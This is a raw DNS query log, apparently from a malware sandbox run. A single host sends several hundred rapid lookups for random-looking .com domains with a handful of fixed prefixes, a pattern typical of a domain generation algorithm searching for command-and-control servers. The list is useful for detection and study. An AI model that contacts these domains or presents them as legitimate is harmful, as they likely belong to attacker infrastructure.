                                                                                                                                                                                                            Nov 11, 2024 18:25:27.710599899 CET192.168.2.101.1.1.10x1fa8Standard query (0)pujyjol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:27.710741997 CET192.168.2.101.1.1.10x665fStandard query (0)puvyxig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:27.712222099 CET192.168.2.101.1.1.10xb8deStandard query (0)vocyzum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:27.712356091 CET192.168.2.101.1.1.10x2eb3Standard query (0)vopybym.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:27.712496042 CET192.168.2.101.1.1.10xb5eeStandard query (0)lyryfyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:27.712713957 CET192.168.2.101.1.1.10xab5aStandard query (0)qegyqov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:27.735543966 CET192.168.2.101.1.1.10x4deeStandard query (0)vocyryf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.411274910 CET192.168.2.101.1.1.10x76c7Standard query (0)vonyzut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.414146900 CET192.168.2.101.1.1.10xae31Standard query (0)gadyvez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.414307117 CET192.168.2.101.1.1.10x69a1Standard query (0)volyjif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.421511889 CET192.168.2.101.1.1.10x1a59Standard query (0)lygynyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.421587944 CET192.168.2.101.1.1.10x9e76Standard query (0)qexykav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.424689054 CET192.168.2.101.1.1.10xc0e4Standard query (0)pufybyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.425239086 CET192.168.2.101.1.1.10xc92dStandard query (0)vowypim.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.425411940 CET192.168.2.101.1.1.10x9076Standard query (0)gaqypuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.449645042 CET192.168.2.101.1.1.10x518aStandard query (0)lyxyjod.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.458619118 CET192.168.2.101.1.1.10xbcddStandard query (0)qedyvap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.475930929 CET192.168.2.101.1.1.10x69a8Standard query (0)qebyrel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.476836920 CET192.168.2.101.1.1.10x1b3eStandard query (0)qegyfeq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.478698015 CET192.168.2.101.1.1.10xb8ccStandard query (0)vocyqot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.481993914 CET192.168.2.101.1.1.10x5bc3Standard query (0)vojygym.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.482326984 CET192.168.2.101.1.1.10x2075Standard query (0)puvywal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.483531952 CET192.168.2.101.1.1.10xc269Standard query (0)vocykec.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.483604908 CET192.168.2.101.1.1.10x84a4Standard query (0)gatycis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.485512972 CET192.168.2.101.1.1.10x675dStandard query (0)gahynuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.485999107 CET192.168.2.101.1.1.10xb12fStandard query (0)qetyxiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.487507105 CET192.168.2.101.1.1.10x83c1Standard query (0)pupydev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.487898111 CET192.168.2.101.1.1.10x7dc6Standard query (0)qekyqoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.488095045 CET192.168.2.101.1.1.10x871dStandard query (0)ganyzuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.490150928 CET192.168.2.101.1.1.10xae52Standard query (0)vopydaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.491388083 CET192.168.2.101.1.1.10x49f7Standard query (0)gahyfyh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.491708040 CET192.168.2.101.1.1.10x1161Standard query (0)qeqylyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.492319107 CET192.168.2.101.1.1.10x14cdStandard query (0)puzymup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.492522001 CET192.168.2.101.1.1.10x393eStandard query (0)lyryxud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.519018888 CET192.168.2.101.1.1.10x9e66Standard query (0)gadydow.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.519274950 CET192.168.2.101.1.1.10x1f53Standard query (0)vofydak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.519428968 CET192.168.2.101.1.1.10x658eStandard query (0)lyxymix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.519572020 CET192.168.2.101.1.1.10x8b4bStandard query (0)pufydaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.519798040 CET192.168.2.101.1.1.10xb0faStandard query (0)gaqyzyb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.520248890 CET192.168.2.101.1.1.10x62b1Standard query (0)gacykas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.520412922 CET192.168.2.101.1.1.10x3524Standard query (0)vojymuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.520540953 CET192.168.2.101.1.1.10xaa1Standard query (0)pujymiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.520889044 CET192.168.2.101.1.1.10xacf7Standard query (0)pumytyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.522099972 CET192.168.2.101.1.1.10x411cStandard query (0)lysyvax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.523646116 CET192.168.2.101.1.1.10x1d6fStandard query (0)qekyhug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.523874044 CET192.168.2.101.1.1.10x602fStandard query (0)galyhib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.524018049 CET192.168.2.101.1.1.10x51f3Standard query (0)pupycop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.524147034 CET192.168.2.101.1.1.10xa14bStandard query (0)vowyzuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.524291039 CET192.168.2.101.1.1.10xe2bfStandard query (0)vonyryk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.524422884 CET192.168.2.101.1.1.10xbad6Standard query (0)qetysog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.525140047 CET192.168.2.101.1.1.10x7afdStandard query (0)qebylyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.525336981 CET192.168.2.101.1.1.10xe114Standard query (0)ganyrew.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.525594950 CET192.168.2.101.1.1.10xa13aStandard query (0)lykygun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.525768995 CET192.168.2.101.1.1.10xbbbfStandard query (0)vopycoc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.526074886 CET192.168.2.101.1.1.10x9114Standard query (0)lyvylyx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.526242018 CET192.168.2.101.1.1.10xfacdStandard query (0)lyryson.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.526415110 CET192.168.2.101.1.1.10x2ed2Standard query (0)purypig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.526710987 CET192.168.2.101.1.1.10x1b97Standard query (0)lykymij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.533488035 CET192.168.2.101.1.1.10x6cb2Standard query (0)qegynul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.533823013 CET192.168.2.101.1.1.10xc4b0Standard query (0)lygyfej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.561889887 CET192.168.2.101.1.1.10x6a69Standard query (0)lymytuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.562069893 CET192.168.2.101.1.1.10x33fStandard query (0)puryxuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.562226057 CET192.168.2.101.1.1.10x92efStandard query (0)pujygug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.564348936 CET192.168.2.101.1.1.10xffaStandard query (0)vofybet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.564727068 CET192.168.2.101.1.1.10xc692Standard query (0)gatydab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.567209959 CET192.168.2.101.1.1.10x50efStandard query (0)qeqytuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.567698956 CET192.168.2.101.1.1.10x1ed4Standard query (0)qexyqip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.568711042 CET192.168.2.101.1.1.10x689eStandard query (0)puzyjov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.569633007 CET192.168.2.101.1.1.10x35faStandard query (0)gacyqoz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.572679996 CET192.168.2.101.1.1.10xe4acStandard query (0)puvylep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.575902939 CET192.168.2.101.1.1.10xeda6Standard query (0)lyvywar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.892950058 CET192.168.2.101.1.1.10xeeeaStandard query (0)vonykam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.893636942 CET192.168.2.101.1.1.10xf1e3Standard query (0)galynus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.905105114 CET192.168.2.101.1.1.10x7fb4Standard query (0)lyrytyx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.910080910 CET192.168.2.101.1.1.10x3fadStandard query (0)vocyjik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.912800074 CET192.168.2.101.1.1.10xfe1dStandard query (0)vopyput.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.913652897 CET192.168.2.101.1.1.10xc666Standard query (0)puvyjiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.913682938 CET192.168.2.101.1.1.10xa9b2Standard query (0)gahyvab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.914361954 CET192.168.2.101.1.1.10x2ef4Standard query (0)pujybev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.914479971 CET192.168.2.101.1.1.10x5903Standard query (0)gatypuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.914877892 CET192.168.2.101.1.1.10x6805Standard query (0)lyvyjoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.915008068 CET192.168.2.101.1.1.10x44f5Standard query (0)qebykoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.915422916 CET192.168.2.101.1.1.10xf0dStandard query (0)vojybef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.915882111 CET192.168.2.101.1.1.10xbe20Standard query (0)qetytup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.916062117 CET192.168.2.101.1.1.10xe79cStandard query (0)lymylen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.916804075 CET192.168.2.101.1.1.10x4dabStandard query (0)lygyvon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.919644117 CET192.168.2.101.1.1.10xb1feStandard query (0)qekynyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.920253992 CET192.168.2.101.1.1.10x33d8Standard query (0)qedysol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.920655966 CET192.168.2.101.1.1.10xe349Standard query (0)volymuc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.921025038 CET192.168.2.101.1.1.10xc352Standard query (0)purytyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.921431065 CET192.168.2.101.1.1.10x2455Standard query (0)qeqyrav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.921957970 CET192.168.2.101.1.1.10x369cStandard query (0)qegyvag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.922494888 CET192.168.2.101.1.1.10x8569Standard query (0)qexynyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.923000097 CET192.168.2.101.1.1.10xe84dStandard query (0)gacyhuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.923175097 CET192.168.2.101.1.1.10x888Standard query (0)lysysir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.942986012 CET192.168.2.101.1.1.10xd39cStandard query (0)pumyleg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.944993973 CET192.168.2.101.1.1.10x8785Standard query (0)vowyrec.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.945368052 CET192.168.2.101.1.1.10x20ccStandard query (0)qexyhul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.945663929 CET192.168.2.101.1.1.10xe75Standard query (0)pufycog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.946225882 CET192.168.2.101.1.1.10xc7d8Standard query (0)gaqyres.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.946700096 CET192.168.2.101.1.1.10xcdc4Standard query (0)lyxygur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.947109938 CET192.168.2.101.1.1.10xe2f1Standard query (0)vofycim.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.947427034 CET192.168.2.101.1.1.10x230bStandard query (0)lykynyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.948240995 CET192.168.2.101.1.1.10xdfc7Standard query (0)pupypil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.970890045 CET192.168.2.101.1.1.10xed7dStandard query (0)ganykah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.973419905 CET192.168.2.101.1.1.10x64b5Standard query (0)pufypuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.976509094 CET192.168.2.101.1.1.10xe610Standard query (0)gadycih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.978744030 CET192.168.2.101.1.1.10x5db8Standard query (0)galyfez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.983944893 CET192.168.2.101.1.1.10xef71Standard query (0)volygyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.989768028 CET192.168.2.101.1.1.10xf5f9Standard query (0)puvymug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.011392117 CET192.168.2.101.1.1.10x42a8Standard query (0)gacynyh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.011888981 CET192.168.2.101.1.1.10x5aafStandard query (0)lyryler.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.012005091 CET192.168.2.101.1.1.10xa32dStandard query (0)qetylel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.013834000 CET192.168.2.101.1.1.10x2c2cStandard query (0)vojydoc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.013976097 CET192.168.2.101.1.1.10xe63dStandard query (0)pumywov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.014174938 CET192.168.2.101.1.1.10x69a5Standard query (0)gatyzyw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.014194965 CET192.168.2.101.1.1.10x4505Standard query (0)lyvymun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.014410973 CET192.168.2.101.1.1.10xf2e6Standard query (0)qebyqig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.014446974 CET192.168.2.101.1.1.10x129dStandard query (0)pujydap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.014678955 CET192.168.2.101.1.1.10xe750Standard query (0)lykyfax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.014841080 CET192.168.2.101.1.1.10xe1f7Standard query (0)ganyqib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.014986992 CET192.168.2.101.1.1.10xb99aStandard query (0)pupyxuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.015140057 CET192.168.2.101.1.1.10x9d10Standard query (0)qekyfep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.015579939 CET192.168.2.101.1.1.10x1524Standard query (0)vopyzyk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.015753031 CET192.168.2.101.1.1.10x8a5dStandard query (0)vonyqof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.015902042 CET192.168.2.101.1.1.10xec83Standard query (0)vocymum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.016112089 CET192.168.2.101.1.1.10xc66aStandard query (0)lygysid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.016386032 CET192.168.2.101.1.1.10x5cccStandard query (0)puzygyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.016597986 CET192.168.2.101.1.1.10x2bfcStandard query (0)qegysiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.016763926 CET192.168.2.101.1.1.10x4740Standard query (0)gahydos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.016992092 CET192.168.2.101.1.1.10x2cacStandard query (0)vowykat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.017144918 CET192.168.2.101.1.1.10x1449Standard query (0)purylal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.020404100 CET192.168.2.101.1.1.10x9423Standard query (0)qedyxuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.020607948 CET192.168.2.101.1.1.10x6ebeStandard query (0)lymywad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.020816088 CET192.168.2.101.1.1.10xc870Standard query (0)lysyxuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.160485983 CET192.168.2.101.1.1.10x10b1Standard query (0)qeqykop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.160531044 CET192.168.2.101.1.1.10x2735Standard query (0)puzybeq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.162106037 CET192.168.2.101.1.1.10x3b7dStandard query (0)gadypub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.172331095 CET192.168.2.101.1.1.10xa3ccStandard query (0)vopyrem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.178735018 CET192.168.2.101.1.1.10x44c4Standard query (0)lyxynej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.179179907 CET192.168.2.101.1.1.10x944bStandard query (0)volybak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.189834118 CET192.168.2.101.1.1.10xf68Standard query (0)pujycil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.190898895 CET192.168.2.101.1.1.10xa1a6Standard query (0)qedytyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.191292048 CET192.168.2.101.1.1.10xfc7aStandard query (0)puvygyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.191850901 CET192.168.2.101.1.1.10xf868Standard query (0)lymyjix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.192193985 CET192.168.2.101.1.1.10x818dStandard query (0)vofyzyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.192445040 CET192.168.2.101.1.1.10x1cb2Standard query (0)qexyfag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.192774057 CET192.168.2.101.1.1.10xaa92Standard query (0)lysytyn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.193084955 CET192.168.2.101.1.1.10x6cdcStandard query (0)vowyqik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.193552017 CET192.168.2.101.1.1.10xccf9Standard query (0)pumyjip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.193722010 CET192.168.2.101.1.1.10xfc5dStandard query (0)lyrywoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.194166899 CET192.168.2.101.1.1.10x6d98Standard query (0)vocygef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.194302082 CET192.168.2.101.1.1.10x77d7Standard query (0)lyxyfan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.194710970 CET192.168.2.101.1.1.10x16afStandard query (0)galyvaw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.194910049 CET192.168.2.101.1.1.10xf4b3Standard query (0)qetyraq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.195183039 CET192.168.2.101.1.1.10xdbabStandard query (0)pupyteg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.195451975 CET192.168.2.101.1.1.10xe8d5Standard query (0)gahycuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.196028948 CET192.168.2.101.1.1.10xe04cStandard query (0)ganyhus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.196111917 CET192.168.2.101.1.1.10x7366Standard query (0)puzydog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.196537971 CET192.168.2.101.1.1.10x7913Standard query (0)qeqyqul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.196568966 CET192.168.2.101.1.1.10xa79bStandard query (0)qebyhuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.197103977 CET192.168.2.101.1.1.10x8b48Standard query (0)lygyxux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.197252035 CET192.168.2.101.1.1.10x8d71Standard query (0)purywoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.197572947 CET192.168.2.101.1.1.10xab2cStandard query (0)gacyfeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.198002100 CET192.168.2.101.1.1.10x9c2aStandard query (0)gatyrah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.199064016 CET192.168.2.101.1.1.10xd7deStandard query (0)lyvygyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.199588060 CET192.168.2.101.1.1.10x916dStandard query (0)qegyxup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.200114965 CET192.168.2.101.1.1.10x9370Standard query (0)vojycit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.201246023 CET192.168.2.101.1.1.10x3b25Standard query (0)qekyvol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.202102900 CET192.168.2.101.1.1.10xd937Standard query (0)vonyjuc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.202738047 CET192.168.2.101.1.1.10xb7a8Standard query (0)gaqyqiw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.203398943 CET192.168.2.101.1.1.10x4108Standard query (0)pufyxyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.204067945 CET192.168.2.101.1.1.10x2638Standard query (0)lykyvor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.434684992 CET192.168.2.101.1.1.10x75d0Standard query (0)qeqykop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.434684992 CET192.168.2.101.1.1.10xe643Standard query (0)vopyrem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.435493946 CET192.168.2.101.1.1.10xf608Standard query (0)puzybeq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.440248966 CET192.168.2.101.1.1.10xcab2Standard query (0)lymyjix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.441971064 CET192.168.2.101.1.1.10x9e4aStandard query (0)pujycil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.444417953 CET192.168.2.101.1.1.10x6d12Standard query (0)vofyzyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.444479942 CET192.168.2.101.1.1.10x6854Standard query (0)qedytyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.445278883 CET192.168.2.101.1.1.10x2159Standard query (0)lyrywoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.445879936 CET192.168.2.101.1.1.10xe8adStandard query (0)gaqyqiw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.446551085 CET192.168.2.101.1.1.10x2695Standard query (0)gatyrah.comA (IP address)IN (0x0001)false
